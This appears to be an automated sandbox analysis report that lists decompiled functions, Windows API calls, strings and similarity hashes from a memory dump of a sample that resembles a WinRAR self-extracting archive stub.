__EH_prolog.LIBCMT ref: 00CB9387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00CB93AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00CB93C9

Part of subcall function 00CBC29A: _wcslen.LIBCMT ref: 00CBC2A2

Part of subcall function 00CC1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CBC116,00000000,.exe,?,?,00000800,?,?,?,00CC8E3C), ref: 00CC1FD1

_swprintf.LIBCMT ref: 00CB9465

Part of subcall function 00CB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CB40A5

MoveFileW.KERNEL32(?,?), ref: 00CB94D4
MoveFileW.KERNEL32(?,?), ref: 00CB9514

Strings

rtmp%d, xrefs: 00CB944E

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: 803cb3aa451bb5de7942bc82f11edbe93b866dcd9b645999d9af3ccd652242f9
Instruction ID: 1844bfabb67487b79191b1a8e354518e3baa840cf1a54771015de2cc70eb2d57
Opcode Fuzzy Hash: 803cb3aa451bb5de7942bc82f11edbe93b866dcd9b645999d9af3ccd652242f9
Instruction Fuzzy Hash: 4D4174B1940258A6DF31EBA0CC85EEE737CEF45340F0049A9B759E3151DB789B89EB60

Function 00CC1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00CC122E

Part of subcall function 00CBB146: GetVersionExW.KERNEL32(?), ref: 00CBB16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00CC1251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00CC1263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00CC1274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00CC1284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00CC1294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00CC12CF
__aullrem.LIBCMT ref: 00CC1379

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 45f9de01162abdd91960d301f0e92f3f89fdce72c31ebe63877135e2c327d69e
Instruction ID: 49069fdeeaecf4f3e1d7c48999d8745db35512894ce0608f11c6c0dcb876a659
Opcode Fuzzy Hash: 45f9de01162abdd91960d301f0e92f3f89fdce72c31ebe63877135e2c327d69e
Instruction Fuzzy Hash: CB4107B15083459FC710DF65C884A6FBBE9FB88314F04892EF996C6211E738E649DB51

Function 00CB2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00CB2536

Part of subcall function 00CB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CB40A5

Part of subcall function 00CC05DA: _wcslen.LIBCMT ref: 00CC05E0

Strings

x%u, xrefs: 00CB26FD
;%u, xrefs: 00CB2523
xc%u, xrefs: 00CB275A

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: 54a2e5999a08bb9e346eecb1273c4210c7d2b0c26815c3f3fbe8c961f166499e
Instruction ID: 63fedac30a7e2e371e42f175a405fe14d549aeed9f80767731754e51833f1298
Opcode Fuzzy Hash: 54a2e5999a08bb9e346eecb1273c4210c7d2b0c26815c3f3fbe8c961f166499e
Instruction Fuzzy Hash: 38F137716043409BCF25EF28C4D5BFE7B996FA0300F08056DFC969B283CB659A49D7A2

Function 00CC9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00CC9D0A

Strings

</style>, xrefs: 00CC9E52
>, xrefs: 00CC9D4B
<br>, xrefs: 00CC9DFE
<style>, xrefs: 00CC9E30
</p>, xrefs: 00CC9DE8

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: cddc9e2c131bebd5ac05b403e2fb9fdd06e72d73e39196a23f11e180f3c51f12
Instruction ID: c84de99e8a40d4c82ffc5bae403bfaa2bab6792c46c910c751fbedafda5a966b
Opcode Fuzzy Hash: cddc9e2c131bebd5ac05b403e2fb9fdd06e72d73e39196a23f11e180f3c51f12
Instruction Fuzzy Hash: AE514A66B4036395DB30AA25D819F7673E0DFB1750F68042EFDD29B2C0FB758E818265

Function 00CDF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00CDFE02,00000000,00000000,00000000,00000000,00000000,00CD529F), ref: 00CDF6CF
__fassign.LIBCMT ref: 00CDF74A
__fassign.LIBCMT ref: 00CDF765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00CDF78B
WriteFile.KERNEL32(?,00000000,00000000,00CDFE02,00000000,?,?,?,?,?,?,?,?,?,00CDFE02,00000000), ref: 00CDF7AA
WriteFile.KERNEL32(?,00000000,00000001,00CDFE02,00000000,?,?,?,?,?,?,?,?,?,00CDFE02,00000000), ref: 00CDF7E3

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 67f0f8e41e5898aea72241f259c6b4dfeb4aaa3cd909b1eef9f0aaae5f995bd8
Instruction ID: 5f42ebdf085948f1f7fbb694615910c19d26368ae607a3572bcd337d41ca2b95
Opcode Fuzzy Hash: 67f0f8e41e5898aea72241f259c6b4dfeb4aaa3cd909b1eef9f0aaae5f995bd8
Instruction Fuzzy Hash: 5D5173B19002499FDB10CFA4DC85AEEBBF4FF09310F14416EE656E7391D670AA42CBA1

Function 00CD2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00CD2937
___except_validate_context_record.LIBVCRUNTIME ref: 00CD293F
_ValidateLocalCookies.LIBCMT ref: 00CD29C8
__IsNonwritableInCurrentImage.LIBCMT ref: 00CD29F3
_ValidateLocalCookies.LIBCMT ref: 00CD2A48

Strings

csm, xrefs: 00CD29DD

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: b51f4beaffd8ea4e020bd38b901db91b09ed345cd0fa8fc2b4af045cb9bd39e5
Instruction ID: 10c9770973edd0cb1dfc0ce8e7a5703bf4261e55f7d753a7c8acb73b4eb9903e
Opcode Fuzzy Hash: b51f4beaffd8ea4e020bd38b901db91b09ed345cd0fa8fc2b4af045cb9bd39e5
Instruction Fuzzy Hash: D541D634A00258AFCF10DF69C895A9EBBF5EF54324F148057EA19AB392D731DA01EF91

Function 00CC9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00CC9EEE
GetWindowRect.USER32(?,00000000), ref: 00CC9F44
ShowWindow.USER32(?,00000005,00000000), ref: 00CC9FDB
SetWindowTextW.USER32(?,00000000), ref: 00CC9FE3
ShowWindow.USER32(00000000,00000005), ref: 00CC9FF9

Strings

RarHtmlClassName, xrefs: 00CC9FA5

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 5b6f2ad9238e186986dbd17ba168ad74b0ec6fb6a878ada2699b5cfd074d0962
Instruction ID: 24527d95e82ec01e890eccd49b53517efbc67fbbafe7327aa666ebb9a4c74c75
Opcode Fuzzy Hash: 5b6f2ad9238e186986dbd17ba168ad74b0ec6fb6a878ada2699b5cfd074d0962
Instruction Fuzzy Hash: 3541CE31004304BFCB215FA5DC4CFAB7BA8FB48705F00851DF90A9A256DB34DA46CB62

Function 00CC9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00CC995E
_wcslen.LIBCMT ref: 00CC9993

Strings

, xrefs: 00CC99B0
<br>, xrefs: 00CC99DF
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00CC9987
 , xrefs: 00CC9A21

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: 2d438db6d2b99b62212b3c304fbaeea640422622e6d335af3b145ba673076820
Instruction ID: 47487c7092b3f6031580af148193c1de4c6e7267888128c4f15304cf423b46ef
Opcode Fuzzy Hash: 2d438db6d2b99b62212b3c304fbaeea640422622e6d335af3b145ba673076820
Instruction Fuzzy Hash: 70315B3264434556DA34AB95DC46F7A73A4EB90320F50442FF5A6473D0FA70EF4193A5

Function 00CDC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00CDC868: _free.LIBCMT ref: 00CDC891

_free.LIBCMT ref: 00CDC8F2

Part of subcall function 00CD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CDC896,?,00000000,?,00000000,?,00CDC8BD,?,00000007,?,?,00CDCCBA,?), ref: 00CD8DE2
Part of subcall function 00CD8DCC: GetLastError.KERNEL32(?,?,00CDC896,?,00000000,?,00000000,?,00CDC8BD,?,00000007,?,?,00CDCCBA,?,?), ref: 00CD8DF4

_free.LIBCMT ref: 00CDC8FD
_free.LIBCMT ref: 00CDC908
_free.LIBCMT ref: 00CDC95C
_free.LIBCMT ref: 00CDC967
_free.LIBCMT ref: 00CDC972
_free.LIBCMT ref: 00CDC97D

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: 742c4ee9798f4b559c5f9eb9b43cbeadb21280dd284d630b2344640ff7912a2f
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: 40111F71580B06BAE520B7B1CC87FCB7BAD9F44B00F404D16B39D662D2DA65B509F750

Function 00CCE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00CCE669,00CCE5CC,00CCE86D), ref: 00CCE605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00CCE61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00CCE630

Strings

KERNEL32.DLL, xrefs: 00CCE600
AcquireSRWLockExclusive, xrefs: 00CCE615
ReleaseSRWLockExclusive, xrefs: 00CCE625

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: ca95a37cb3ce21230b47823e24e331c5d485aa2e538e23ea42323de246936eb5
Instruction ID: e0080752c0789812a2d499814020c8dd97a030acaabb9dbe08e028f8bc6d2307
Opcode Fuzzy Hash: ca95a37cb3ce21230b47823e24e331c5d485aa2e538e23ea42323de246936eb5
Instruction Fuzzy Hash: 8FF0FC367A27E59B0F214F76DC85FAA62C96A27755300443DFA15D7200EF20CE519BD0

Function 00CC146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00CC14C2

Part of subcall function 00CBB146: GetVersionExW.KERNEL32(?), ref: 00CBB16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CC14E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00CC1500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00CC1513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00CC1523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00CC1533

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: bd985cff12d0897fa31222e2d6c8b21890785d9149f3e57641772cf2a0934f2d
Instruction ID: 4696e6abef24a561ab1296c1d98f9e855e6cfa8fbc92159aae548ba898bf9954
Opcode Fuzzy Hash: bd985cff12d0897fa31222e2d6c8b21890785d9149f3e57641772cf2a0934f2d
Instruction Fuzzy Hash: D531E875108345ABC704DFA9C884A9FB7F8BF98714F044A1EF995C3210E734E649CBA6

Function 00CD2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00CD2AF1,00CD02FC,00CCFA34), ref: 00CD2B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CD2B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CD2B2F
SetLastError.KERNEL32(00000000,00CD2AF1,00CD02FC,00CCFA34), ref: 00CD2B81

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 3ded764709644207d405101caa01c405bc57fed075c5f81d327fc9d7a34c6c72
Instruction ID: 36a0da1cfd8ace7dd926419127709532d88ff6901ec62a133f0c7f152dfe886c
Opcode Fuzzy Hash: 3ded764709644207d405101caa01c405bc57fed075c5f81d327fc9d7a34c6c72
Instruction Fuzzy Hash: 7A0124321183523FA7142B757CC9B2A2B8AEF627B07300B3BF321493E0EF915E00A504

Function 00CD97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00CF1098,00CD4674,00CF1098,?,?,00CD40EF,?,?,00CF1098), ref: 00CD97E9
_free.LIBCMT ref: 00CD981C
_free.LIBCMT ref: 00CD9844
SetLastError.KERNEL32(00000000,?,00CF1098), ref: 00CD9851
SetLastError.KERNEL32(00000000,?,00CF1098), ref: 00CD985D
_abort.LIBCMT ref: 00CD9863

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: e97c79354d5f442bb3c880807526352dbe3586c1ea7360b0a874a4394d046e0c
Instruction ID: 5eb6326c261f8372d60d90567460bbf52dd885c5c4d1935b4b7e2540dcdb895e
Opcode Fuzzy Hash: e97c79354d5f442bb3c880807526352dbe3586c1ea7360b0a874a4394d046e0c
Instruction Fuzzy Hash: 56F0A43914464266C75233247C4AB2F2A66CFD2F75F25012BF724973D2EE348D06B565

Function 00CCDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CCDC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CCDC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CCDC72
TranslateMessage.USER32(?), ref: 00CCDC7C
DispatchMessageW.USER32(?), ref: 00CCDC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CCDC91

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: d76b82bca1da8540cff2255c1ace6f6d3c6702a3b7f57fdfc04eee4927d7da56
Instruction ID: f4d46d5eaff86a5af182c774b70516d8d8cfa717093074bb847b3ae4cd6a4683
Opcode Fuzzy Hash: d76b82bca1da8540cff2255c1ace6f6d3c6702a3b7f57fdfc04eee4927d7da56
Instruction Fuzzy Hash: FCF03C72A01219BBCF20ABA5DC4CEDF7FADEF45791B008021F50AE2150DA749646C7B0

Function 00CBC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00CC05DA: _wcslen.LIBCMT ref: 00CC05E0

Part of subcall function 00CBB92D: _wcsrchr.LIBVCRUNTIME ref: 00CBB944

_wcslen.LIBCMT ref: 00CBC197
_wcslen.LIBCMT ref: 00CBC1DF

Strings

.rar, xrefs: 00CBC0E1, 00CBC134
.sfx, xrefs: 00CBC11A
.exe, xrefs: 00CBC10B

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 81b9814aa3197b7a116a8021827d0ca5ba0a86c4765a0a6dba59dbd885faa6ce
Instruction ID: 1b283ef4a32b45891cfa47e183276515ba468677a97b68070146fe6a165015a8
Opcode Fuzzy Hash: 81b9814aa3197b7a116a8021827d0ca5ba0a86c4765a0a6dba59dbd885faa6ce
